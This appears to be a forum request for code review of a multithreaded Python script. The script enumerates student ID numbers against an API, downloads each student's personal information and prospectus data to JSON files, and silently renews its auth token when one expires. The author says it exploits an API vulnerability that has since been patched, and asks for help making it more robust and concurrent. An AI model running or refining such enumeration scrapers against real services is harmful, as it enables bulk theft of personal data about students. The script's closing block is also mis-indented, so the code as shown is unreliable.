I've been working on a Python script that fetches student data from an API using multiple threads for concurrency. The script retrieves both student information and prospectus data and saves them to JSON files.
I would appreciate feedback on the following aspects of the code:
- Exception Handling: The current exception handling is quite broad (bare except:). Are there better practices for handling exceptions here, especially network errors? A rough sketch of the direction I'm considering follows this list.
- Code Duplication: I've noticed some duplication, especially when re-fetching data after encountering an invalid token. How can I refactor the code to make it more concise and maintainable? (A rough refactor idea is sketched after the code.)
- Thread Safety: Given the concurrent nature of the script, I'm particularly interested in potential race conditions around the TokenChecker list used for inter-thread communication. Are there more robust ways to ensure thread safety here? (The lock-based alternative I've been weighing is sketched just before the code.)
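For the exception handling point, this is roughly the narrower direction I've been considering; it's only a sketch, and fetch_json and its URL handling are placeholders rather than part of the script below:

import requests

def fetch_json(url, headers):
    try:
        response = requests.get(url, headers=headers, timeout=(3.05, 5))
        response.raise_for_status()  # turn 4xx/5xx responses into exceptions
        return response.json()
    except requests.exceptions.Timeout:
        print(f"Timed out fetching {url}")
    except requests.exceptions.RequestException as exc:
        print(f"Request failed for {url}: {exc}")
    return None

I'm not sure whether catching requests.exceptions.RequestException is specific enough, or whether ConnectionError and HTTPError deserve separate handling.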
Note: The API vulnerability exploited here has already been reported to the dev team and has been patched. I'm just here to get feedback on the code itself. Thanks for understanding!
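For the thread safety point, the alternative I've been weighing is simply guarding the shared list with a lock (again just a sketch; record_responses is a placeholder name):

import threading

token_checker = []
token_checker_lock = threading.Lock()

def record_responses(student_response, prospectus_response):
    # Serialize appends so concurrent workers can't interleave on the shared list.
    with token_checker_lock:
        token_checker.append({"responses": [student_response, prospectus_response]})

I understand CPython's list.append is effectively atomic under the GIL, but I don't know whether relying on that is considered acceptable, or whether something like queue.Queue would be the more idiomatic choice.

Here is the script: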
import requests
from get_token import get_token
import json
import threading
from datetime import datetime
def write_file(filename, data):
    # Write the raw response body to disk; 'with' guarantees the file is closed.
    with open(filename, 'w') as f:
        f.write(data)
def main():
    token = get_token()
    headers = {
        "Authorization": token
    }
    def fetch_data(idnum, TokenChecker):
        print(f"Fetching Student: {idnum}")
        # Retry until the API gives a definitive answer (200) or a server error (500).
        while True:
            try:
                getStudentResponse = requests.get(f'https://apiname/get_info?studid={idnum}', headers=headers, timeout=(3.05, 5))
                getProspectusResponse = requests.get(f'https://apiname/prospectus?studid={idnum}', headers=headers, timeout=(3.05, 5))
                student_status_code = getStudentResponse.status_code
                prospectus_status_code = getProspectusResponse.status_code
                if (student_status_code == 200 and prospectus_status_code == 200) or (student_status_code == 500 or prospectus_status_code == 500):
                    break
            except:
                print(f"Fetch timed out on ID: {idnum}")
        write_file(f'prospectus/{idnum.split("-")[0]}/{idnum}.json', getProspectusResponse.text)
        write_file(f'student_info/{idnum.split("-")[0]}/{idnum}.json', getStudentResponse.text)
        TokenChecker.append({"responses": [getStudentResponse, getProspectusResponse]})
        return [getStudentResponse, getProspectusResponse]
    for i in range(2019, 2025):
        max_id = 10000
        num_threads = 50
        for j in range(0, max_id, num_threads):
            TokenChecker = []
            threads = []
            for k in range(num_threads):
                idnum = f"{str(i).zfill(4)}-{str(j + k).zfill(4)}"
                t = threading.Thread(target=fetch_data, args=(idnum, TokenChecker,))
                t.daemon = True
                threads.append(t)
            for k in range(num_threads):
                threads[k].start()
            for k in range(num_threads):
                threads[k].join()
            getStudentResponse, getProspectusResponse = TokenChecker[len(TokenChecker) - 1]['responses']
            student_info = json.loads(getStudentResponse.text)
            prospectus = json.loads(getProspectusResponse.text)
            try:
                if student_info['message'] == 'Token is invalid' or prospectus['message'] == 'Token is invalid':
                    print(f'Change Token at: {datetime.now().strftime("%d/%m/%Y %H:%M:%S")}')
                    headers = {
                        "Authorization": get_token()
                    }
                    # Re-run the same batch with the refreshed token.
                    threads = []
                    for k in range(num_threads):
                        idnum = f"{str(i).zfill(4)}-{str(j + k).zfill(4)}"
                        t = threading.Thread(target=fetch_data, args=(idnum, TokenChecker,))
                        t.daemon = True
                        threads.append(t)
                    for k in range(num_threads):
                        threads[k].start()
                    for k in range(num_threads):
                        threads[k].join()
            except:
                pass
print("Fetching Done.")
if __name__ == "__main__":
main()
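Regarding the duplication point, the rough direction I've considered is pulling the batch logic into a single helper built on concurrent.futures, so the token-refresh retry reuses it instead of repeating the thread-spawning loops. This is only a sketch; fetch_one is a placeholder for the real per-student fetch and isn't part of the script above:

from concurrent.futures import ThreadPoolExecutor

def fetch_one(idnum, headers):
    # Placeholder for the real per-student fetch (the two GETs plus the file writes).
    ...

def fetch_batch(id_numbers, headers, num_threads=50):
    # One place that runs a whole batch; the token-refresh path can call it again
    # with refreshed headers instead of duplicating the threading boilerplate.
    with ThreadPoolExecutor(max_workers=num_threads) as pool:
        futures = [pool.submit(fetch_one, idnum, headers) for idnum in id_numbers]
        return [future.result() for future in futures]

I'd also welcome opinions on whether a thread pool is the cleaner way to remove the duplicated loops or overkill for this script.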